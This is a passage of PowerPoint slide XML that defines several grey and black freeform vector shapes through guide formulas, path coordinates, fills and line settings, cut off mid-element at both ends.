                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10756" name="Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1290" y="2259"/>
                <a:ext cx="46" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 46"/>
                  <a:gd name="T1" fmla="*/ 6 h 55"/>
                  <a:gd name="T2" fmla="*/ 4 w 46"/>
                  <a:gd name="T3" fmla="*/ 7 h 55"/>
                  <a:gd name="T4" fmla="*/ 3 w 46"/>
                  <a:gd name="T5" fmla="*/ 9 h 55"/>
                  <a:gd name="T6" fmla="*/ 1 w 46"/>
                  <a:gd name="T7" fmla="*/ 14 h 55"/>
                  <a:gd name="T8" fmla="*/ 0 w 46"/>
                  <a:gd name="T9" fmla="*/ 21 h 55"/>
                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                  <a:gd name="T11" fmla="*/ 28 h 55"/>
                  <a:gd name="T12" fmla="*/ 0 w 46"/>
                  <a:gd name="T13" fmla="*/ 36 h 55"/>
                  <a:gd name="T14" fmla="*/ 0 w 46"/>
                  <a:gd name="T15" fmla="*/ 46 h 55"/>
                  <a:gd name="T16" fmla="*/ 3 w 46"/>
                  <a:gd name="T17" fmla="*/ 55 h 55"/>
                  <a:gd name="T18" fmla="*/ 3 w 46"/>
                  <a:gd name="T19" fmla="*/ 55 h 55"/>
                  <a:gd name="T20" fmla="*/ 3 w 46"/>
                  <a:gd name="T21" fmla="*/ 54 h 55"/>
                  <a:gd name="T22" fmla="*/ 3 w 46"/>
                  <a:gd name="T23" fmla="*/ 51 h 55"/>
                  <a:gd name="T24" fmla="*/ 3 w 46"/>
                  <a:gd name="T25" fmla="*/ 49 h 55"/>
                  <a:gd name="T26" fmla="*/ 3 w 46"/>
                  <a:gd name="T27" fmla="*/ 46 h 55"/>
                  <a:gd name="T28" fmla="*/ 4 w 46"/>
                  <a:gd name="T29" fmla="*/ 43 h 55"/>
                  <a:gd name="T30" fmla="*/ 4 w 46"/>
                  <a:gd name="T31" fmla="*/ 39 h 55"/>
                  <a:gd name="T32" fmla="*/ 5 w 46"/>
                  <a:gd name="T33" fmla="*/ 35 h 55"/>
                  <a:gd name="T34" fmla="*/ 6 w 46"/>
                  <a:gd name="T35" fmla="*/ 32 h 55"/>
                  <a:gd name="T36" fmla="*/ 7 w 46"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 8 w 46"/>
                  <a:gd name="T39" fmla="*/ 25 h 55"/>
                  <a:gd name="T40" fmla="*/ 11 w 46"/>
                  <a:gd name="T41" fmla="*/ 21 h 55"/>
                  <a:gd name="T42" fmla="*/ 14 w 46"/>
                  <a:gd name="T43" fmla="*/ 19 h 55"/>
                  <a:gd name="T44" fmla="*/ 17 w 46"/>
                  <a:gd name="T45" fmla="*/ 16 h 55"/>
                  <a:gd name="T46" fmla="*/ 21 w 46"/>
                  <a:gd name="T47" fmla="*/ 15 h 55"/>
                  <a:gd name="T48" fmla="*/ 26 w 46"/>
                  <a:gd name="T49" fmla="*/ 14 h 55"/>
                  <a:gd name="T50" fmla="*/ 26 w 46"/>
                  <a:gd name="T51" fmla="*/ 13 h 55"/>
                  <a:gd name="T52" fmla="*/ 26 w 46"/>
                  <a:gd name="T53" fmla="*/ 13 h 55"/>
                  <a:gd name="T54" fmla="*/ 28 w 46"/>
                  <a:gd name="T55" fmla="*/ 12 h 55"/>
                  <a:gd name="T56" fmla="*/ 29 w 46"/>
                  <a:gd name="T57" fmla="*/ 11 h 55"/>
                  <a:gd name="T58" fmla="*/ 33 w 46"/>
                  <a:gd name="T59" fmla="*/ 9 h 55"/>
                  <a:gd name="T60" fmla="*/ 36 w 46"/>
                  <a:gd name="T61" fmla="*/ 7 h 55"/>
                  <a:gd name="T62" fmla="*/ 41 w 46"/>
                  <a:gd name="T63" fmla="*/ 5 h 55"/>
                  <a:gd name="T64" fmla="*/ 46 w 46"/>
                  <a:gd name="T65" fmla="*/ 2 h 55"/>
                  <a:gd name="T66" fmla="*/ 46 w 46"/>
                  <a:gd name="T67" fmla="*/ 2 h 55"/>
                  <a:gd name="T68" fmla="*/ 45 w 46"/>
                  <a:gd name="T69" fmla="*/ 2 h 55"/>
                  <a:gd name="T70" fmla="*/ 43 w 46"/>
                  <a:gd name="T71" fmla="*/ 2 h 55"/>
                  <a:gd name="T72" fmla="*/ 42 w 46"/>
                  <a:gd name="T73" fmla="*/ 2 h 55"/>
                  <a:gd name="T74" fmla="*/ 40 w 46"/>
                  <a:gd name="T75" fmla="*/ 1 h 55"/>
                  <a:gd name="T76" fmla="*/ 38 w 46"/>
                  <a:gd name="T77" fmla="*/ 1 h 55"/>
                  <a:gd name="T78" fmla="*/ 35 w 46"/>
                  <a:gd name="T79" fmla="*/ 1 h 55"/>
                  <a:gd name="T80" fmla="*/ 32 w 46"/>
                  <a:gd name="T81" fmla="*/ 1 h 55"/>
                  <a:gd name="T82" fmla="*/ 28 w 46"/>
                  <a:gd name="T83" fmla="*/ 0 h 55"/>
                  <a:gd name="T84" fmla="*/ 26 w 46"/>
                  <a:gd name="T85" fmla="*/ 1 h 55"/>
                  <a:gd name="T86" fmla="*/ 22 w 46"/>
                  <a:gd name="T87" fmla="*/ 1 h 55"/>
                  <a:gd name="T88" fmla="*/ 19 w 46"/>
                  <a:gd name="T89" fmla="*/ 1 h 55"/>
                  <a:gd name="T90" fmla="*/ 14 w 46"/>
                  <a:gd name="T91" fmla="*/ 2 h 55"/>
                  <a:gd name="T92" fmla="*/ 11 w 46"/>
                  <a:gd name="T93" fmla="*/ 2 h 55"/>
                  <a:gd name="T94" fmla="*/ 7 w 46"/>
                  <a:gd name="T95" fmla="*/ 4 h 55"/>
                  <a:gd name="T96" fmla="*/ 4 w 46"/>
                  <a:gd name="T97" fmla="*/ 6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6"/>
                  <a:gd name="T148" fmla="*/ 0 h 55"/>
                  <a:gd name="T149" fmla="*/ 46 w 46"/>
                  <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                    <a:moveTo>
                      <a:pt x="4" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10757" name="Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2300"/>
                <a:ext cx="37" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 7 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 7 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 10"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 6 h 10"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 10"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 3 h 10"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 3 h 10"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 10"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 10"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 1 h 10"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 10"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 10"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 10"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 10"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 10"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 2 h 10"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 3 h 10"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 10"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 10"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 6 h 10"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 10"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 10"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 3 h 10"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 3 h 10"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 3 h 10"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 10"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 10"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 10"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 3 h 10"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 3 h 10"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 10"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 10"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 8 h 10"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 10 h 10"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 7 h 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0"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 10 h 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0">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10758" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2275"/>
                <a:ext cx="37" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 7 h 11"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 7 h 11"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 11"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 6 h 11"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 11"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 4 h 11"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 4 h 11"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 3 h 11"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 2 h 11"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 2 h 11"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 11"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 11"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 11"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 11"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 2 h 11"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 3 h 11"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 4 h 11"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 11"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 11"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 6 h 11"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 11"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 11"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 5 h 11"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 4 h 11"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 4 h 11"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 3 h 11"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 3 h 11"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 3 h 11"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 4 h 11"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 4 h 11"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 11"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 11"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 9 h 11"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 11 h 11"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 7 h 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1"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 11 h 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1">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10759" name="Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1261" y="2264"/>
                <a:ext cx="61" cy="113"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 61"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 0 w 61"/>
                  <a:gd name="T3" fmla="*/ 110 h 113"/>
                  <a:gd name="T4" fmla="*/ 19 w 61"/>
                  <a:gd name="T5" fmla="*/ 113 h 113"/>
                  <a:gd name="T6" fmla="*/ 18 w 61"/>
                  <a:gd name="T7" fmla="*/ 98 h 113"/>
                  <a:gd name="T8" fmla="*/ 61 w 61"/>
                  <a:gd name="T9" fmla="*/ 105 h 113"/>
                  <a:gd name="T10" fmla="*/ 61 w 61"/>
                  <a:gd name="T11" fmla="*/ 99 h 113"/>
                  <a:gd name="T12" fmla="*/ 30 w 61"/>
                  <a:gd name="T13" fmla="*/ 96 h 113"/>
                  <a:gd name="T14" fmla="*/ 29 w 61"/>
                  <a:gd name="T15" fmla="*/ 83 h 113"/>
                  <a:gd name="T16" fmla="*/ 9 w 61"/>
                  <a:gd name="T17" fmla="*/ 83 h 113"/>
                  <a:gd name="T18" fmla="*/ 8 w 61"/>
                  <a:gd name="T19" fmla="*/ 80 h 113"/>
                  <a:gd name="T20" fmla="*/ 7 w 61"/>
                  <a:gd name="T21" fmla="*/ 76 h 113"/>
                  <a:gd name="T22" fmla="*/ 6 w 61"/>
                  <a:gd name="T23" fmla="*/ 69 h 113"/>
                  <a:gd name="T24" fmla="*/ 4 w 61"/>
                  <a:gd name="T25" fmla="*/ 59 h 113"/>
                  <a:gd name="T26" fmla="*/ 2 w 61"/>
                  <a:gd name="T27" fmla="*/ 48 h 113"/>
                  <a:gd name="T28" fmla="*/ 1 w 61"/>
                  <a:gd name="T29" fmla="*/ 34 h 113"/>
                  <a:gd name="T30" fmla="*/ 2 w 61"/>
                  <a:gd name="T31" fmla="*/ 20 h 113"/>
                  <a:gd name="T32" fmla="*/ 6 w 61"/>
                  <a:gd name="T33" fmla="*/ 3 h 113"/>
                  <a:gd name="T34" fmla="*/ 0 w 61"/>
                  <a:gd name="T35" fmla="*/ 0 h 1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1"/>
                  <a:gd name="T55" fmla="*/ 0 h 113"/>
                  <a:gd name="T56" fmla="*/ 61 w 61"/>
                  <a:gd name="T57" fmla="*/ 113 h 1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1" h="113">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
